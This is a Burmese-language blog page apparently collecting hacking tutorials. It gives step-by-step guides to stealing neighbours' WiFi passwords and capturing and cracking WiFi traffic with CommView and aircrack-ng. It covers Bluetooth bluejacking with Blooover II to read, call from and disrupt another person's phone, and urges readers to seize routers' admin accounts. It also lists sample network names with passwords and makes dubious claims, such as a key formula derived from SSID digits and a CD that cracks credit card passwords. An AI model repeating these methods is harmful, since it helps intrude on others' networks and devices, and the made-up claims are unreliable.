အခု Wi FI ကေတာ့ အဲလိုမဟုတ္ဘူးဗ် ADMIN ရဲ႕ Knowledge ေတြ Skill ေတြ SQLT ေတြနဲ႕ဆိုင္တယ္ဗ်
http://www.xaiyak.blogspot.com/2012/04/how-to-hack-crack-wifi-network-in.html အဲကိုသြားၾကည့္ပါ
WEP ကိုေတာ့ ရပါတယ္ MAC မကန္႕ထားရင္နဲ႕ သံုးတဲ့ User အနည္းအမ်ားေပၚမူတည္ၿပီး ရပါတယ္
က်ေနာ္စမ္းသက္တာလည္း 75% ေလာက္ေအာင္ျမင္တယ္ က်ေနာ္ၿမိဳ႕က လိုင္း ေတြမွာ 75% ေလာက္ ကိုက်ေနာ္ရပါတယ္
ဒီေတာ့ Wi Fi ကိုဟက္တာဟာ အခက္ခဲႀကီးမဟုတ္ေၾကာင္းေျပာခ်င္ပါတယ္
WPA2 ကိုေတာ့ ခုထိမရဖူးပါ က်ေနာ္အခု ဒီပို႕ကေနပဲဖိတ္ေခၚပါရေစ
ဟက္ကင္း၀ါသနာရွင္မ်ားအတြက္ေသာ္၄င္း ပညာရွင္မ်ားအတြက္ေသာ္၄င္း စိန္ေခၚမႈတစ္ရပ္ျဖစ္ႏိုင္ပါတယ္
အခု Wi Fi ကို ဟက္တာေအာင္ျမင္တဲ့သူမ်ားကို ေတာင္းဆိုပါရေစ
အင္တာနက္လိုင္းရတာေတာ့ဟုတ္ပါၿပီ Router ကို Configure လုပ္ဖို႕ကိစၥကို ခင္ဗ်ားေတြ ေဆာင္ရြက္ႏိုင္ၿပီလား?
က်ေနာ္ဆိုလိုတာက Wi Fi ကို ဟက္တာေအာင္ျမင္ၿပီဆိုပါေတာ့ Admin ခပ္ပိန္းပိန္းဆိုရင္ေတာ့ ဟုတ္တာေပါ့
ခင္ဗ်ားတို႕က်ေနာ္တို႕လုိေကာင္ေတြဆိုရင္ အနည္းဆံုး 3ရက္တစ္ခါေတာ့ Configure ၀င္လုပ္မွာပဲ အဲမွာ ဘယ္သူေတြသံုးေနတယ္ဆိုတာသိလို႕
Block လုပ္ႏိုင္ပါတယ္ အဲအတြက္ က်ေနာ္တို႕ေတြဟာ Wi Fi ပတ္စ၀က္တာမက Router ရဲ႕ Admin account ကိုပါသိဖို႕လိုအပ္လာပါၿပီ
ဖိတ္ေခၚတယ္ဗ်ာ က်ေနာ္လည္း ေလ့လာေနပါတယ္
ေနာက္တစ္ခုက က်ေနာ္ 10 တန္းေျဖၿပီး ကြန္ပ်ဴတာဆိုင္မွာလုပ္ေနတုန္းက အင္တာနက္နဲ႕ပတ္သတ္တဲ့သင္တန္းတစ္ခုသင္ဖူးတယ္ဗ် (ေလက်ယ္တာမဟုတ္ၾကြားတာမဟုတ္ပါ)
အဲတုနး္က အဲတုန္းက သင္တန္းလာတက္တဲ့ အကိုႀကီးႏွစ္ေယာက္စကားေၾကာင့္ က်ေနာ္ အခုလိုေျပာင္းလဲခဲ့တာလဲပါတယ္ဗ်
သူတို႕ေျပာတာက က်ေနာ့္ကိုရည္ရြယ္တာေတာ့ဟုတ္၀ူးဗ် တခ်ိဳ႕ေကာင္ေတြကတဲ့ ကြန္ပ်ဴတာ ကို ၀င္ဒိုးေလး တင္တက္႐ံုနဲ႕ ဆရာႀကီးျဖစ္ေနၿပီထင္တဲ့ေကာင္ေတြအမ်ားႀကီးပဲတဲ့
အဲ ေကာင္ေတြက ၀င္ဒိုးေတာင္ ဘာမွန္းမသိ သူမ်ားလုပ္တာသင္တာပဲသိၿပီးကိုတင္တဲ့ ၀င္းဒိုးတာ XP လား Vista လား Service Pack ဘယ္ေလာက္မွန္းမသိတဲ့ေကာင္ေတြတဲ့
ေနာက္ ေဆာ့၀ဲေတြေတာင္စံုေအာင္မသြငး္တတ္တဲ့ေကာင္ေတြတဲ့ မွန္ပါတယ္ တခ်ိဳ႕ဆိုအခုထိ Patch မျဖည္တတ္ Crack မျဖည္တတ္တာေတြ တပံုႀကီးပါ
အဲတုန္းကလည္းက်ေနာ္လညး္ အဲေလာက္မဆိုးေပမဲ့ အဲအကိုေတြေျပာတဲ့စရင္းထဲမွာပါပါတယ္ ဒါေၾကာင့္ျပင္တယ္ေလ့လာတယ္ မွတ္သားတယ္ ခုလိုအေျခအေနထိေရာက္ေအာင္ပဲဗ်ာ
အခုဆိုလဲ ဟက္ခ်င္ျပဳခ်င္တဲ့သူေတြဟာ သူမ်ားကိုမဟက္ခင္ ကို႕အတြက္လံုခ်ံဳေရးကိုကို ကာကြယ္ႏိုင္လားဆိုတာကိုအရင္ဆံုးဆံုးျဖတ္ပါ
သူမ်ားကို ဟက္ခ်င္ရင္ ကိုအဟက္မခံရေအာင္ ႀကိဳတင္ကာကြယ္ပါလို႕အႀကံေပးခ်င္ပါတယ္ ဟက္မယ္ဆိုရင္လညး္ အလကားရတဲ့ေဆာ့၀ဲေတြစြတ္မသံုပါနဲ႕
ကိုခံရႏိုင္လို႕ပါ အခုအေျခအေနဟာလည္း လူတိုင္းကဟက္ဖို႕စိတ္၀င္စားေနၾကေတာ့ မဟက္နဲ႕လို႕ေျပာတာထက္ အားလံုး ေဆြးေႏြးတိုင္ပင္ မွ်ေ၀ ၿပီးကူညီၾကရင္
ေအာင္ျမင္ၾကမွာပါလို႕ အႀကံျပဳျခင္ပါတယ္
သင့္မေကာင္းမႈသည္သင့္ထံတစ္ေန႕ျပန္လာတတ္သည္
ႀကိဳးစားလွ်က္
Xai Yak

Monday, April 2

WIFI Password ခိုးနည္းေလး ေပးလိုက္ပါတယ္

WIFI Password ခိုးနည္းေလးပါ။ ဒီနည္းေလးကို စမ္းၾကည္႔လိုက္ပါေနာ္။

အရင္ဆံုးကိုယ္႔ ့ပတ္၀န္းက်င္မွာရွိတဲ ့Wireless Wifi ကို wifi ဘယ္လိုမ်ိဳး ေပၚေနလဲဆိုတာအရင္ၾကည္႔ပါ။

အခု Wireless Wifi Password ကို အလြယ္တကူ ခိုးယူဖို႔ဆိုတာက သိပ္ေတာ႔မလြယ္ဘူးေနာ္
လုပ္နည္း နွစ္နည္းေတာ႔ ေတြ႔ထားပါတယ္..
ပထမနည္းကေတာ႔ Cracking ေခြေတြရွာ၀ယ္ျပီး ခိုးတဲ႔နည္း။။
ဒုတိယနည္းက Crscking Dell နဲ႔ရွာၾကည္႔တဲ႔နည္းေလးေပါ႔။။
လုပ္နည္းေလးကေတာ႔။
အရင္ဆံုး ကိုယ္႔ကြန္ျပဴတာမွာ Wireless ေတာ႔ ပါဖို႔လိုပါတယ္။
အကၡရာေပၚေနတဲ ့ SSID ေပၚကို သြားၿပီး Double click နွိပ္ပါ.။

ဥပမာ .....(069500) လိုမ်ိဳးေပၚေနတာကိုေျပာတာပါ။( ဒီ ဂဏန္းေလးေတြက ဥပမာေပးတာပါ။ ကိုယ္႔စက္မွာေပၚတာကို ၾကည္႔ရမွာျဖစ္ျပီး ဂဏန္းေနာက္
က ထည္႔ရမဲ႔စာလံုးကို ေတာ႔ေသခ်ာထည္႔ေပးဖို႔လိုပါတယ္။
အဲဒါကို ကလစ္လိုက္ရင္ Password ေတာင္းလာလိုက္မယ္။
ဒါဆို ဒီ Password ကို ဘယ္လို နည္းနဲ႔ ရေအာင္ယူမလဲဆိုေတာ႔ ဥပမာ..ျပထားတဲ႔ ( 069500 ) ကိုျဖဳတ္ျပီး ေရွ႔က ( ၀ )ကိုျဖဳတ္ျပီး ( 695001FFB0 )
လို႔ရိုက္ထည္႔ပါ။
အဲလိုရိုက္ထည္လိုက္မယ္ဆိုရင္ Confirm ေတာင္းလာရင္ နကိုယ္အတိုင္း( 695001FFB0 ) လို႔ပဲျပန္ေရးျပီး OK သို႔မဟုတ္ Next ကိုနိုပ္လိုက္ပါ။
ခနေစာင္႔.... Connection ေနရာမွာ Connected ျဖစ္သြားပါလိမ္႔မည္။။။

ဥပမာ..ေအာက္မွာၾကည္႔ ပါ။
Azlie
617a6c69303761707231393738


092f222
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

shaiful
30313232343433333730313233

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Ghost
abcd368368
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Yong ah foo
31393230333331313435323233
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
meingan
63353131313036303535323735
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

ဒါကအထက္ကနည္းေလးနဲ႔ ဟက္လိုက္လို႔ေပၚလာမဲ႔ကိုယ္႔ ပတ္၀န္းက်င္မွာရွိတဲ ့ Wireless Wifi နာမည္နဲ ့ password ေလးနမူနာေလးေတြပါ။

ေနာက္တစ္နည္း။။ ။။

SSID နာမည္ေတြကို Cracking ေခြနဲ႔ခိုးတဲ႔နည္းပါ။
အဲဒီအေခြက Wireless password တင္မကဘူး Creadit card password အထိ Hacking လုပ္လို ့ရပါတယ္။

CD အေေခြေလးပါတင္ေပးထားပါတယ္ ေဒါင္းထားလိုက္ပါဦး



အဆင္ေျပပါေစဗ်ာ

Google Chrome ကို သံုးျပီး အျခားကြန္ပ်ဴတာ ကို ထိန္းခ်ဳပ္မယ္

1. သင့္စက္မွာ ထည့္ခ်င္ရင္ ဒီမွာႏွိပ္ေဒါင္းလိုက္ပါChrome Remote Desktop Extension Chrome Browser အတြက္ျဖစ္ပါတယ္ size က 20 MB ရွိပါတယ္
2. ဒီ extension ကို စက္မွာထာ့္ျပီးရင္ ေအာက္မွာျပထားတဲ့ေနရာတစ္ ခုခုကေန ဖြင့္ႏိုင္ပါတယ္


3. ကၽြန္ေတာ္ကေတာ့ ဒီကေနျပေပးပါမယ္
4. Continue ကိုႏွိပ္ပါ
5. Allow access ကိုႏွိပ္ပါ
6. အျခားကြန္ပ်ဴတာကိုရွယ္ဖို႔ Share This Computer ကိုႏွိပ္ပါ
7. ကုဒ္တစ္ခုကို သင္ျမင္ေနရပါမယ္ သင္ထိန္းခ်ဳပ္လိုတဲ့ သင့္ သူငယ္ခ်င္းကြန္ပ်ဴတာကို အဲကုဒ္ေလးေပးလိုက္ပါ
အဲကုဒ္ေလးေပးလိုက္လို႔ သင့္သူငယ္ခ်င္းကေတာ့ သင့္စက္ကို ထိန္းခ်ဳပ္ႏိုင္ျပီဆိုျပီး ေပ်ာ္ေနမည္ ဟိဟိ, Access a Shared Computer ကိုသူႏွိပ္တာနဲ႔ ေအာက္ကပံုေလးသင့္စက္မွာ လာေပၚေနမယ္
အဲ ကုဒ္ေတြ က ဥပမာေနာ္


8.ဒီေဆာ့၀ဲလ္ကို သူ႔စက္မွာ Run မထားရင္ သင့္ သူငယ္ခ်င္းက ထိန္းခ်ဳပ္လို႔ မရပါဘူး ဟိဟိ ကိုယ့္ပဲ ခ်ဳပ္ေတာ့္ေနာ္ ၾကဳပ္က်ပ္ေတာ့လိေပါ့ေနာ္ တားတားနဲ႕ဆိုင္ဘူးေနာ္တားတားက လမ္းညႊန္တာ
INSTALL CHROME EXTENSION

Bluetooth ျဖင့္ တစ္ေယာက္ေသာသူ၏ အခ်က္လက္နွင့္ဖုနး္အလကားေခၚဆိုျခင္း

ဥပမာတစ္ခုအေနနဲ႕ W550i phone
သည္ W800iphone ၏ဖုန္း
အကူျဖင္႕ခိုးယူဖုန္းေျပာျခင္း
ကလိျခင္းမ်ားျပဳလုပ္မည္ျဖစ္သည္။
အရင္ဆံုး

http://www.bluejackingtools.com
/java/blooover-ii/

ဒီလိပ္စာႏွိပ္ျပီး
ဖိုင္ကိုေဒါင္းလုပ္ရယူပါ။ထို႕ေနာက္

ဖုန္းကိုကြန္ပ်ဴတာႏွင့္ခ်ိတ္ဆက္ျပီး
၎zip file အား ဖုန္းထဲသို႕သြင္းယူပါ။
ထို႕ေနာက္ ဖုနး္အား Bluetooth ဖြင့္ပါ။
အဲေနာက္ blooverII channel ကိုဖြင့္ပါ။bluetooth scan စတင္
ဖက္သြားပါလိ့မ့္မည္။
ထို႕ေနာက္ w800iphone ကိုေရြးပါ။
Audit ကိုဆက္လက္ေရြးခ်ယ္ေပးပါ။
Audit Result ရွိ အခ်က္လက္မ်ားကိုၾကည့္ရႈ
ဲဲပီး Dismiss ကိုႏွိပ္ပါ။
Quick Configuration ရွိ
Do Bluedug ကိုအမွန္ျခစ္ေပးပီး Apply ကိုနွိပ္ပါ။
BT info ေပၚလာခ်ိန္၀ယ္ Connect ကိုနွိပ္ပါ။
Inquiry Device ကိုေရြးျပီး မိမိ Hack လိုေသာ


ဖုန္းအမ်ိဳးစားျဖစ္ေသာ W800iphone ကိုေရြးျပီး
ထို႕ေနာက္


information- မိမိသည္တစ္ဖက္ေသာဖုန္း၏အခ်က္လက္ကိုၾကည့္ျခင္း
Ringing-မိမိသည္တစ္ဖက္ေသာဖုန္း၏ Ring Toneကိုေျပာင္းလဲျခင္း
call-မိမိသည္တစ္ဖက္ေသာဖုန္း၏ေဘကိုကုန္ေစျခင္းျဖင့္စကားေျပာၾကည့္ျခင္း
Change Laguage- တစ္ဖက္သူ၏ဖုနး္ဘာသာစကားကိုေျပာင္းျခင္း
Key-တစ္ဖက္သူ၏ဖုနး္အားကီးပတ္လြဲေစျခင္း
စေသာ Function ေပါင္းမ်ားစြာကိုတစ္ဖက္သူအားနစ္နာစြာ
ျပဳလုပ္ႏိုင္ပါသည္။

wifi unlock key ကိုဟတ္ခ်င္သူေတြအတြက္ပါ

လုပ္ပံုနည္ေတြအဆင္႕ဆင္႕ေတြကို ဗီဒီယိုဖိုင္ႏွင္တင္ထားပါတယ္
ေအာက္မွာေနာ္http://www.wifidecoder.com
.အရင္ဆံုး၀ိုင္ဖိုင္ မဟက္ခင္မွာ Common view of Wifi ေဆာ့၀ဲေလးကို ဒီလိပ္စာေလးမွာ

www.mediafire.com/?86aj871hbs7pqzg
ေဒါင္းလုပ္ျပဳလုပ္ရယူပါ။

ေအာက္ေဖာ္ျပပါေပးထားတဲ့ဇယာေလးက common view of wifi

ေဆာဖ့္၀ဲသံုးလို႕ရမည္.. adapter နဲ႕ wifi ပစၥည္းေလးပါေတြအျပင္သူနဲ႕တြဲဖက္သံုးသင့္တဲ့..

၀င္းဒိုးအမ်ိဳးစားေလးေတြပါဘဲ

802.11b/g/n and 802.11a/b/g/n Adapters

Adapterအမ်ိဳးအစား 802.11 Bands ခ်ိတ္ဆက္သည့္ပံုစံ အလုပ္လုပ္သည့္ ၀င္းဒိုးမ်ား
မွတ္ခ်က္ ေထာက္ခံခ်က္
Atheros AR5008, AR5009, AR92xx BGN or ABGN Integrated XP or higher
Not rated *
Broadcom 802.11n BGN or ABGN Integrated Vista or higher See tech. notes Not rated *
D-Link DWA-160 v.A1 and v.A2 ABGN USB XP or higher Recommended 4
D-Link DWA-542 BGN PCI XP or higher
3
D-Link DWA-547 BGN PCI XP or higher
3
D-Link DWA-552 BGN PCI XP or higher
3
D-Link DWA-556 BGN PCIe XP or higher
2
D-Link DWA-642 BGN PC Card XP or higher
4
D-Link DWA-643 BGN ExpressCard XP or higher Recommended 3
D-Link DWA-645 v.A1 BGN PC Card XP or higher
4
D-Link DWA-652 BGN PC Card XP or higher Recommended 4
Dell Wireless 1505, 1510, 1515, 1520, 1530 ABGN Integrated Vista or higher See tech. notes 4
Dell Wireless 1702 BGN Integrated XP or higher
4
Intel 1000 BGN Integrated Vista or higher See tech. notes 4
Intel 4965 ABGN Integrated Vista or higher See tech. notes 5
Intel 5100, 5150, 5300, 5350 ABGN Integrated Vista or higher See tech. notes 5
Intel 6200, 6250, 6300, 6350 ABGN Integrated Vista or higher See tech. notes 5
Linksys WEC600N ABGN ExpressCard Vista or higher See tech. notes 4
Linksys WUSB600N ABGN USB Vista or higher See tech. notes 3
NEC AtermWL300NC ABGN PC Card XP or higher Recommended 5
NETGEAR WN111 v2 BGN USB XP or higher See tech. notes 5
NETGEAR WNDA3100 v1 ABGN USB XP or higher Recommended 4
NETGEAR WNDA3100 v2 ABGN USB Vista or higher See tech. notes 4
Proxim ORiNOCO 8494 ABGN USB XP or higher Recommended 5
Realtek RTL8192E BGN PCIe Vista or higher See tech. notes 2
SMC Networks SMCWUSB-N2 BGN USB XP or higher Recommended 5
TP-Link TL-WN811N BGN PC Card XP or higher Recommended 4
TP-Link TL-WN821N v1 and v2 BGN USB XP or higher Recommended 5
TP-Link TL-WN822N v1 BGN USB XP or higher Recommended 5
TP-Link TL-WN910N BGN PC Card XP or higher Recommended 4
Ubiquiti SR71C ABGN PC Card XP or higher Recommended 5
Ubiquiti SR71X ABGN ExpressCard XP or higher Recommended 5
Ubiquiti SR71-USB ABGN USB XP or higher Recommended 5
CACE AirPcap Nx USB ABGN USB XP or higher See tech. notes 4

802.11b/g and 802.11a/b/g Adapters
Adapter 802.11 Bands Form Factor Supported OS Limitations or Comments Sensitivity on a 1-5 scale
Atheros AR5001-AR5007 BG or ABG Integrated XP or higher
Not rated *
Broadcom 802.11 b/g or a/b/g BG or ABG Integrated Vista or higher See tech. notes Not rated *
Cisco Aironet 802.11a/b/g ABG PC Card XP or higher
5
D-Link WNA-2330 BG PC Card XP or higher
5
D-Link DWL-G680 BG PC Card XP or higher
5
D-Link DWL-AG660 ABG PC Card XP or higher Recommended 5
D-Link DWL-AG530 ABG PCI XP or higher
4
D-Link DWL-AG650 ABG PC Card XP or higher
4
D-Link DWL-AG520 ABG PCI XP or higher
4
D-Link DWL-G630 BG PC Card XP or higher H/W Rev. C or Rev. D only 4
D-Link DWL-G520 BG PCI XP or higher
3
D-Link DWL-G650 BG PC Card XP or higher See tech. notes 4
D-Link DWA-120 BG USB Vista or higher See tech. notes 3
Dell Wireless 1390 BG Integrated Vista or higher See tech. notes 4
Dell Wireless 1395 BG Integrated Vista or higher See tech. notes 4
Dell Wireless 1397 BG Integrated Vista or higher See tech. notes 4
Intel 3945ABG ABG Integrated Vista or higher See tech. notes 5
Linksys WPC55AG ABG PC Card XP or higher
4
NETGEAR WAG511 ABG PC Card XP or higher
4
NETGEAR WG511T BG PC Card XP or higher
4
NETGEAR WG511U 54AG+ ABG PC Card XP or higher
5
NETGEAR WG511U ABG PC Card XP or higher Recommended 5
NETGEAR WPN311 BG PCI XP or higher
3
NETGEAR WPN511 BG PC Card XP or higher
5
Proxim ORiNOCO 8480 ABG PC Card XP or higher
4
Proxim ORiNOCO 8481 ABG PC Card XP or higher
4
Proxim ORiNOCO 8482 ABG PCI XP or higher
3
Proxim ORiNOCO 8470 BG PC Card XP or higher
4
Proxim ORiNOCO 8471 BG PC Card XP or higher
4
SMC 2336W-AG v2 ABG PC Card XP or higher
3
TRENDnet TEW-501PC ABG PC Card XP or higher
4
Ubiquiti SRC ABG PC Card XP or higher Recommended 5
CACE AirPcap Ex ABG USB XP or higher See tech. notes 5
၎ေနာက္မွာေတာ့...မိမိကြန္ပ်ဴတာတြင္ရွိေသာ adapter ကိုသိရွိျပီး window အမ်ိဳးစားကိုက္ညီပါကဆက္လက္လုပ္

ေဆာင္ရေပမည္။

အဲေနာက္ http://www.aircrack-ng.org ၀က္ဆိုဒ္ေလးမွ aircrack-ng ေဆာ့၀ဲေလးကိုေဒါင္းလုပ္ျပဳလုပ္ရပါမည္.

ခုနကေဒါင္းလုပ္ျပဳလုပ္ရရွိထားတဲ့ common view application ရရွိလာမည့္ .cap ဖိုင္ေလးကိုအသံုးခ်ျပီး access point

ရဲ႕ password ကိုထုတ္ေဖာ္ဖို႕အတြက္ျဖစ္ပါတယ္..

common view Wifi ေဆာ့ဖ္၀ဲေလးကို မိမိကြန္ပ်ဴတာမွာ install လုပ္လုိက္ပါ

အဲေနာက္ မိမိကြန္ပ်ဴတာေလးအား wifi ခလုပ္ကိုဖြင့္ထားပါ.. external အေနျဖင့္သံုးသူမ်ား wifi adapter ကို မိမိကြန္ပ်ဴ

တာတြင္တပ္ဆင့္ပါ.. အဲေနာက္ wifi adpater ၏ driver ကိုတပ္ဆင္ေပးပါ.
SSID ကဘာလဲဆိုေတာ့ မိမိတို႕wifi နဲကခ်ိတ္ဆက္မိတဲ့ အင္တာနက္ဆိုင္နာမည္အျဖစ္ျမင္ေတြ႕ရမွာပါ.

အဲေနာက္ပံုတြင္အနီေရာင္ကြင္းေလးျဖင့္ ျပထားေသာ play icon ေလးကိုတစ္ခ်က္ႏွိပ္ပါ။

ေနာက္ထပ္ေပၚလာေသာ ေဘာက္စ္တြင္ start scanning ကိုနွိပ္ပါ။

ညာဘက္ေကာ္လံရွိ မိမိပတ္စေ၀ါ့ေဖာ္ထုတ္လိုေသာ ၀ိုင္ဖိုင္နာမည္သို႕မဟုတ္အင္တာနက္ဆိုင္နာမည္ကိုေရြးေပးပါ။

အဲေနာက္ capture ကိုနွိပ္ပါ။
အဲလို capture ကုိနွိပ္လိုက္တာနဲ႕ scanner dialog box ေပ်ာက္သြားတဲ့အခါ...

capture ရိုက္ထားတဲ့မွတ္တမ္းေတြကို သိမ္းဆည္းဖို႕အတြက္

setting>option>memory usage ကိုနွိပ္ပါ။ အဲေနာက္ maximum packets တြင္ ၂၀၀၀၀ ရိုက္ထည့္ပါ။

maximum lines တြင္ 20 ရိုက္ထည့္ပါ။ ျပီးေနာက္ ok ကိုနွိပ္ပါ။
အဲေနာက္ logging tab ကိုတစ္ခ်က္ႏွိပ္ျပီး autosaving တြင္အမွန္ခ်စ္ေလးေပးပါ။

Maximun directroy size တြင္ 2000ျဖည့္ျပီး Average log file size တြင္ ၂၀ရိုက္ထည့္ေပးပါ။
2000 ႏွင့္ 20 သတ္မွတ္ျပီးတာနဲ႕ COncatenate Logs ကိုႏွိပ္ပါ။ အဲေနာက ္မိမိနွစ္သက္ရာ folder

အလြတ္ေလးကိုေရြးးခ်ယ္ျပီး concatenate ကိုနွိပ္ပါ။ concatenate ကိုေရြးျပီးတာနဲ႕ တျပိဳင္နက္

မိမိေရြးခ်ယ္ထားေသာ folder အလြတ္တြင္ .ncf ဖိုင္ေလးကိုေတြ႕ရွိရမွာျဖစ္ပါတယ္..


၎ .ncf ဖိုင္ေလးအား .cap ဖိုင္ အျဖစ္ေျပာင္းရန္အတြက္

္File>log viewer>load common view logs > .ncf ဖိုင္ေလးကိုေရြးခ်ယ္ေပးပါ။

File>Export>Wireshark/TCP dump ကိုနွိပ္ျပီး .cap ဖိုင္အျဖစ္သို႕ရယူပါ။

Wifi Password ကို crack လုပ္ဖုိ႕ရန္အတြက္

ေဒါင္းလုပ္ျပဳလုပ္လုိ႕ရရွိတဲ့ Aircrack -ng folder ေလးကိုဖြင့္လုိက္ပါ..

၎ aircarck -ng folder>bin>Aircarck -ng GUI.exe ကိုနွိပ္ပါ။

အဲေနာက္ .ncf ဖိုင္ကေန .cap ဖိုင္အျဖစ္ေျပာင္းထားေသာ .cap ဖိုင္ေလးကိုေရြးခ်ယ္ျပီး

aircarck -ng မွ တဆင့္ wifi password မ်ား ရယူွႏိုင္ပါျပီ..